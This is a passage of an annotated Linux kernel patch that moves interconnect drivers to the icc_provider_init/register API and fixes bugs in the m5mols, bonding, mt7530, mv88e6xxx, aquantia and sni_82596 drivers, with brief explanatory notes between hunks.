+@@ -700,11 +699,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	provider->data = data;
+ 	provider->get_bw = msm8974_get_bw;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		goto err_disable_clks;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -712,7 +707,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err_del_icc;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -729,15 +724,16 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ 
+-err_del_icc:
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-
+-err_disable_clks:
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+ 
+ 	return ret;
+@@ -747,9 +743,9 @@ static int msm8974_icc_remove(struct platform_device *pdev)
+ {
+ 	struct msm8974_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index ddbdf0943f94e..333adb21e7176 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -216,8 +216,8 @@ static int qcom_osm_l3_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_osm_l3_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+@@ -303,14 +303,9 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	provider->set = qcom_osm_l3_set;
+ 	provider->aggregate = icc_std_aggregate;
+ 	provider->xlate = of_icc_xlate_onecell;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -333,12 +328,15 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ err:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/samsung/exynos.c b/drivers/interconnect/samsung/exynos.c
+index 6559d8cf80687..72e42603823b9 100644
+--- a/drivers/interconnect/samsung/exynos.c
++++ b/drivers/interconnect/samsung/exynos.c
+@@ -98,12 +98,13 @@ static int exynos_generic_icc_remove(struct platform_device *pdev)
+ 	struct exynos_icc_priv *priv = platform_get_drvdata(pdev);
+ 	struct icc_node *parent_node, *node = priv->node;
+ 
++	icc_provider_deregister(&priv->provider);
++
+ 	parent_node = exynos_icc_get_parent(priv->dev->parent->of_node);
+ 	if (parent_node && !IS_ERR(parent_node))
+ 		icc_link_destroy(node, parent_node);
+ 
+ 	icc_nodes_remove(&priv->provider);
+-	icc_provider_del(&priv->provider);
+ 
+ 	return 0;
+ }
+@@ -132,15 +133,11 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	provider->inter_set = true;
+ 	provider->data = priv;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret < 0)
+-		return ret;
++	icc_provider_init(provider);
+ 
+ 	icc_node = icc_node_create(pdev->id);
+-	if (IS_ERR(icc_node)) {
+-		ret = PTR_ERR(icc_node);
+-		goto err_prov_del;
+-	}
++	if (IS_ERR(icc_node))
++		return PTR_ERR(icc_node);
+ 
+ 	priv->node = icc_node;
+ 	icc_node->name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%pOFn",
+@@ -149,6 +146,9 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 				 &priv->bus_clk_ratio))
+ 		priv->bus_clk_ratio = EXYNOS_ICC_DEFAULT_BUS_CLK_RATIO;
+ 
++	icc_node->data = priv;
++	icc_node_add(icc_node, provider);
++
+ 	/*
+ 	 * Register a PM QoS request for the parent (devfreq) device.
+ 	 */
+@@ -157,9 +157,6 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_node_del;
+ 
+-	icc_node->data = priv;
+-	icc_node_add(icc_node, provider);
+-
+ 	icc_parent_node = exynos_icc_get_parent(bus_dev->of_node);
+ 	if (IS_ERR(icc_parent_node)) {
+ 		ret = PTR_ERR(icc_parent_node);
+@@ -171,14 +168,17 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 			goto err_pmqos_del;
+ 	}
+ 
++	ret = icc_provider_register(provider);
++	if (ret < 0)
++		goto err_pmqos_del;
++
+ 	return 0;
+ 
+ err_pmqos_del:
+ 	dev_pm_qos_remove_request(&priv->qos_req);
+ err_node_del:
+ 	icc_nodes_remove(provider);
+-err_prov_del:
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 998a5cfdbc4e9..662d219c39bf4 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -16,6 +16,10 @@ if MD
+ config BLK_DEV_MD
+ 	tristate "RAID support"
+ 	select BLOCK_HOLDER_DEPRECATED if SYSFS
++	# BLOCK_LEGACY_AUTOLOAD requirement should be removed
++	# after relevant mdadm enhancements - to make "names=yes"
++	# the default - are widely available.
++	select BLOCK_LEGACY_AUTOLOAD
+ 	help
+ 	  This driver lets you combine several hard disk partitions into one
+ 	  logical block device. This can be used to simply append one
+diff --git a/drivers/media/i2c/m5mols/m5mols_core.c b/drivers/media/i2c/m5mols/m5mols_core.c
+index 2201d2a26353a..c90442feb6dca 100644
+--- a/drivers/media/i2c/m5mols/m5mols_core.c
++++ b/drivers/media/i2c/m5mols/m5mols_core.c
+@@ -488,7 +488,7 @@ static enum m5mols_restype __find_restype(u32 code)
+ 	do {
+ 		if (code == m5mols_default_ffmt[type].code)
+ 			return type;
+-	} while (type++ != SIZE_DEFAULT_FFMT);
++	} while (++type != SIZE_DEFAULT_FFMT);
+ 
+ 	return 0;
+ }
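
[Editorial note, not part of the patch] The m5mols fix replaces type++ with ++type in the do/while condition: post-increment compares the old value, so the body would run one extra time with type == SIZE_DEFAULT_FFMT and index past the end of the format table; pre-increment exits before that out-of-bounds pass. A small standalone demonstration of the corrected form:

	#include <stdio.h>

	#define NFMT 3

	int main(void)
	{
		int fmt[NFMT] = {10, 20, 30};
		unsigned int type = 0;

		/* With "type++ != NFMT" the body would also execute for
		 * type == NFMT, reading fmt[NFMT] out of bounds; the
		 * pre-increment form below stops first. */
		do {
			printf("fmt[%u] = %d\n", type, fmt[type]);
		} while (++type != NFMT);

		return 0;
	}
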
+diff --git a/drivers/memory/tegra/mc.c b/drivers/memory/tegra/mc.c
+index 2f7a58a9df1ae..b38b565b308ec 100644
+--- a/drivers/memory/tegra/mc.c
++++ b/drivers/memory/tegra/mc.c
+@@ -769,16 +769,12 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 	mc->provider.aggregate = mc->soc->icc_ops->aggregate;
+ 	mc->provider.xlate_extended = mc->soc->icc_ops->xlate_extended;
+ 
+-	err = icc_provider_add(&mc->provider);
+-	if (err)
+-		return err;
++	icc_provider_init(&mc->provider);
+ 
+ 	/* create Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_MC);
+-	if (IS_ERR(node)) {
+-		err = PTR_ERR(node);
+-		goto del_provider;
+-	}
++	if (IS_ERR(node))
++		return PTR_ERR(node);
+ 
+ 	node->name = "Memory Controller";
+ 	icc_node_add(node, &mc->provider);
+@@ -805,12 +801,14 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 			goto remove_nodes;
+ 	}
+ 
++	err = icc_provider_register(&mc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&mc->provider);
+-del_provider:
+-	icc_provider_del(&mc->provider);
+ 
+ 	return err;
+ }
+diff --git a/drivers/memory/tegra/tegra124-emc.c b/drivers/memory/tegra/tegra124-emc.c
+index 85bc936c02f94..00ed2b6a0d1b2 100644
+--- a/drivers/memory/tegra/tegra124-emc.c
++++ b/drivers/memory/tegra/tegra124-emc.c
+@@ -1351,15 +1351,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1380,12 +1378,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra20-emc.c b/drivers/memory/tegra/tegra20-emc.c
+index 25ba3c5e4ad6a..d1f01f80dcbdf 100644
+--- a/drivers/memory/tegra/tegra20-emc.c
++++ b/drivers/memory/tegra/tegra20-emc.c
+@@ -1034,15 +1034,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1063,12 +1061,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra30-emc.c b/drivers/memory/tegra/tegra30-emc.c
+index 9ba2a9e5316bd..1ea3792beb86d 100644
+--- a/drivers/memory/tegra/tegra30-emc.c
++++ b/drivers/memory/tegra/tegra30-emc.c
+@@ -1546,15 +1546,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1575,12 +1573,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/mmc/host/atmel-mci.c b/drivers/mmc/host/atmel-mci.c
+index bb9bbf1c927b6..dd18440a90c58 100644
+--- a/drivers/mmc/host/atmel-mci.c
++++ b/drivers/mmc/host/atmel-mci.c
+@@ -1817,7 +1817,6 @@ static void atmci_tasklet_func(struct tasklet_struct *t)
+ 				atmci_writel(host, ATMCI_IER, ATMCI_NOTBUSY);
+ 				state = STATE_WAITING_NOTBUSY;
+ 			} else if (host->mrq->stop) {
+-				atmci_writel(host, ATMCI_IER, ATMCI_CMDRDY);
+ 				atmci_send_stop_cmd(host, data);
+ 				state = STATE_SENDING_STOP;
+ 			} else {
+@@ -1850,8 +1849,6 @@ static void atmci_tasklet_func(struct tasklet_struct *t)
+ 				 * command to send.
+ 				 */
+ 				if (host->mrq->stop) {
+-					atmci_writel(host, ATMCI_IER,
+-					             ATMCI_CMDRDY);
+ 					atmci_send_stop_cmd(host, data);
+ 					state = STATE_SENDING_STOP;
+ 				} else {
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index c2333c7acac9b..101581d83982a 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -369,7 +369,7 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 					MAX_POWER_ON_TIMEOUT, false, host, val,
+ 					reg);
+ 		if (ret)
+-			dev_warn(mmc_dev(host->mmc), "Power on failed\n");
++			dev_info(mmc_dev(host->mmc), "Power on failed\n");
+ 	}
+ }
+ 
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index fce9301c8ebbc..45d3cb557de73 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1774,6 +1774,19 @@ void bond_lower_state_changed(struct slave *slave)
+ 		slave_err(bond_dev, slave_dev, "Error: %s\n", errmsg);	\
+ } while (0)
+ 
++/* The bonding driver uses ether_setup() to convert a master bond device
++ * to ARPHRD_ETHER, which resets the target netdevice's flags so we always
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ */
++static void bond_ether_setup(struct net_device *bond_dev)
++{
++	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++
++	ether_setup(bond_dev);
++	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++}
++
+ /* enslave device <slave> to bond device <master> */
+ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 		 struct netlink_ext_ack *extack)
+@@ -1865,10 +1878,8 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 
+ 			if (slave_dev->type != ARPHRD_ETHER)
+ 				bond_setup_by_slave(bond_dev, slave_dev);
+-			else {
+-				ether_setup(bond_dev);
+-				bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+-			}
++			else
++				bond_ether_setup(bond_dev);
+ 
+ 			call_netdevice_notifiers(NETDEV_POST_TYPE_CHANGE,
+ 						 bond_dev);
+@@ -2288,9 +2299,7 @@ err_undo_flags:
+ 			eth_hw_addr_random(bond_dev);
+ 		if (bond_dev->type != ARPHRD_ETHER) {
+ 			dev_close(bond_dev);
+-			ether_setup(bond_dev);
+-			bond_dev->flags |= IFF_MASTER;
+-			bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++			bond_ether_setup(bond_dev);
+ 		}
+ 	}
+ 
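
[Editorial note, not part of the patch] bond_ether_setup() exists because ether_setup() clobbers dev->flags wholesale: the helper saves the one bit that may legitimately survive (IFF_SLAVE), runs the destructive setup, then restores IFF_MASTER plus the saved bit. A stub-level sketch (the flag values here are illustrative, not the real IFF_* constants):

	struct net_dev { unsigned int flags; };

	#define IFF_MASTER_BIT	0x1	/* illustrative values only */
	#define IFF_SLAVE_BIT	0x2

	/* Mimics ether_setup()'s destructive reset of dev->flags. */
	static void ether_setup_stub(struct net_dev *dev)
	{
		dev->flags = 0;
	}

	static void bond_ether_setup_stub(struct net_dev *dev)
	{
		unsigned int slave_flag = dev->flags & IFF_SLAVE_BIT;

		ether_setup_stub(dev);
		dev->flags |= IFF_MASTER_BIT | slave_flag;
	}
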
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index c68f48cd1ec08..07f6776bba12b 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -272,7 +272,7 @@ static const u16 ksz8795_regs[] = {
+ 	[S_BROADCAST_CTRL]		= 0x06,
+ 	[S_MULTICAST_CTRL]		= 0x04,
+ 	[P_XMII_CTRL_0]			= 0x06,
+-	[P_XMII_CTRL_1]			= 0x56,
++	[P_XMII_CTRL_1]			= 0x06,
+ };
+ 
+ static const u32 ksz8795_masks[] = {
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 1e0b8bcd59e6c..1757d6a2c72ae 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -430,8 +430,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	switch (interface) {
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 		trgint = 0;
+-		/* PLL frequency: 125MHz */
+-		ncpo1 = 0x0c80;
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
+@@ -462,38 +460,40 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+-	/* Lower Tx Driving for TRGMII path */
+-	for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-	/* Disable MT7530 core and TRGMII Tx clocks */
+-	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	/* Setup the MT7530 TRGMII Tx Clock */
+-	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+-	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+-	core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP4,
+-		   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
+-		   RG_SYSPLL_BIAS_LPF_EN);
+-	core_write(priv, CORE_PLL_GROUP2,
+-		   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
+-		   RG_SYSPLL_POSDIV(1));
+-	core_write(priv, CORE_PLL_GROUP7,
+-		   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+-		   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+-
+-	/* Enable MT7530 core and TRGMII Tx clocks */
+-	core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-		 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	if (!trgint)
++	if (trgint) {
++		/* Lower Tx Driving for TRGMII path */
++		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
++			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++		/* Disable MT7530 core and TRGMII Tx clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
++			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++
++		/* Setup the MT7530 TRGMII Tx Clock */
++		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
++		core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
++		core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP4,
++			   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
++			   RG_SYSPLL_BIAS_LPF_EN);
++		core_write(priv, CORE_PLL_GROUP2,
++			   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
++			   RG_SYSPLL_POSDIV(1));
++		core_write(priv, CORE_PLL_GROUP7,
++			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
++			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
++
++		/* Enable MT7530 core and TRGMII Tx clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
++			 REG_GSWCK_EN | REG_TRGMIICK_EN);
++	} else {
+ 		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+ 			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+ 				   RD_TAP_MASK, RD_TAP(16));
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2206,7 +2206,7 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
+-	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
++	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+ 	val |= MHWTRAP_MANUAL;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 3b8b2d0fbafaf..3a6db36574ad7 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3549,7 +3549,7 @@ static int mv88e6xxx_get_max_mtu(struct dsa_switch *ds, int port)
+ 		return 10240 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		return 1632 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+-	return 1522 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
++	return ETH_DATA_LEN;
+ }
+ 
+ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+@@ -3557,6 +3557,17 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 	int ret = 0;
+ 
++	/* For families where we don't know how to alter the MTU,
++	 * just accept any value up to ETH_DATA_LEN
++	 */
++	if (!chip->info->ops->port_set_jumbo_size &&
++	    !chip->info->ops->set_max_frame_size) {
++		if (new_mtu > ETH_DATA_LEN)
++			return -EINVAL;
++
++		return 0;
++	}
++
+ 	if (dsa_is_dsa_port(ds, port) || dsa_is_cpu_port(ds, port))
+ 		new_mtu += EDSA_HLEN;
+ 
+@@ -3565,9 +3576,6 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+-	else
+-		if (new_mtu > 1522)
+-			ret = -EINVAL;
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+ 	return ret;
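
The mv88e6xxx change rejects an unsupported MTU before any register access is
attempted, instead of discovering the limitation at the bottom of the function.
The shape of the early guard, as a sketch using the ops names from the hunk:

    /* Sketch: if the family has no way to program a frame size, accept
     * only the default Ethernet MTU and return before touching registers.
     */
    if (!chip->info->ops->port_set_jumbo_size &&
        !chip->info->ops->set_max_frame_size)
    	return new_mtu > ETH_DATA_LEN ? -EINVAL : 0;
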
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 25129e723b575..2dc8d215a5918 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -412,6 +412,25 @@ int aq_xdp_xmit(struct net_device *dev, int num_frames,
+ 	return num_frames - drop;
+ }
+ 
++static struct sk_buff *aq_xdp_build_skb(struct xdp_buff *xdp,
++					struct net_device *dev,
++					struct aq_ring_buff_s *buff)
++{
++	struct xdp_frame *xdpf;
++	struct sk_buff *skb;
++
++	xdpf = xdp_convert_buff_to_frame(xdp);
++	if (unlikely(!xdpf))
++		return NULL;
++
++	skb = xdp_build_skb_from_frame(xdpf, dev);
++	if (!skb)
++		return NULL;
++
++	aq_get_rxpages_xdp(buff, xdp);
++	return skb;
++}
++
+ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 				       struct xdp_buff *xdp,
+ 				       struct aq_ring_s *rx_ring,
+@@ -431,7 +450,7 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 
+ 	prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (!prog)
+-		goto pass;
++		return aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 
+ 	prefetchw(xdp->data_hard_start); /* xdp_frame write */
+ 
+@@ -442,17 +461,12 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 	act = bpf_prog_run_xdp(prog, xdp);
+ 	switch (act) {
+ 	case XDP_PASS:
+-pass:
+-		xdpf = xdp_convert_buff_to_frame(xdp);
+-		if (unlikely(!xdpf))
+-			goto out_aborted;
+-		skb = xdp_build_skb_from_frame(xdpf, aq_nic->ndev);
++		skb = aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 		if (!skb)
+ 			goto out_aborted;
+ 		u64_stats_update_begin(&rx_ring->stats.rx.syncp);
+ 		++rx_ring->stats.rx.xdp_pass;
+ 		u64_stats_update_end(&rx_ring->stats.rx.syncp);
+-		aq_get_rxpages_xdp(buff, xdp);
+ 		return skb;
+ 	case XDP_TX:
+ 		xdpf = xdp_convert_buff_to_frame(xdp);
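
Factoring the convert-and-build sequence into aq_xdp_build_skb() lets both the
no-program path and the XDP_PASS path take their page references through
aq_get_rxpages_xdp() in one place. A sketch of the generic xdp_buff-to-skb
conversion the helper wraps; both calls are existing kernel APIs:

    #include <net/xdp.h>

    /* Sketch: convert an xdp_buff to an sk_buff via an xdp_frame. The
     * real helper additionally takes page references on success.
     */
    static struct sk_buff *xdp_to_skb(struct xdp_buff *xdp,
    				  struct net_device *dev)
    {
    	struct xdp_frame *xdpf = xdp_convert_buff_to_frame(xdp);

    	return xdpf ? xdp_build_skb_from_frame(xdpf, dev) : NULL;
    }
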
+diff --git a/drivers/net/ethernet/i825xx/sni_82596.c b/drivers/net/ethernet/i825xx/sni_82596.c
+index daec9ce04531b..54bb4d9a0d1ea 100644
+--- a/drivers/net/ethernet/i825xx/sni_82596.c
++++ b/drivers/net/ethernet/i825xx/sni_82596.c
+@@ -78,6 +78,7 @@ static int sni_82596_probe(struct platform_device *dev)
+ 	void __iomem *mpu_addr;
+ 	void __iomem *ca_addr;
+ 	u8 __iomem *eth_addr;
++	u8 mac[ETH_ALEN];
+ 
+ 	res = platform_get_resource(dev, IORESOURCE_MEM, 0);
+ 	ca = platform_get_resource(dev, IORESOURCE_MEM, 1);
+@@ -109,12 +110,13 @@ static int sni_82596_probe(struct platform_device *dev)
+ 		goto probe_failed;
+ 
+ 	/* someone seems to like messed up stuff */
+-	netdevice->dev_addr[0] = readb(eth_addr + 0x0b);
+-	netdevice->dev_addr[1] = readb(eth_addr + 0x0a);
+-	netdevice->dev_addr[2] = readb(eth_addr + 0x09);
+-	netdevice->dev_addr[3] = readb(eth_addr + 0x08);
+-	netdevice->dev_addr[4] = readb(eth_addr + 0x07);
+-	netdevice->dev_addr[5] = readb(eth_addr + 0x06);
++	mac[0] = readb(eth_addr + 0x0b);
++	mac[1] = readb(eth_addr + 0x0a);
++	mac[2] = readb(eth_addr + 0x09);
++	mac[3] = readb(eth_addr + 0x08);
++	mac[4] = readb(eth_addr + 0x07);
++	mac[5] = readb(eth_addr + 0x06);
++	eth_hw_addr_set(netdevice, mac);
+ 	iounmap(eth_addr);
+ 
+ 	if (netdevice->irq < 0) {
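
Since dev->dev_addr became const, drivers fill a local buffer and commit it with
eth_hw_addr_set() rather than writing the bytes in place. A sketch of the pattern
used above, with the byte-reversed EEPROM layout taken from the hunk:

    u8 mac[ETH_ALEN];
    int i;

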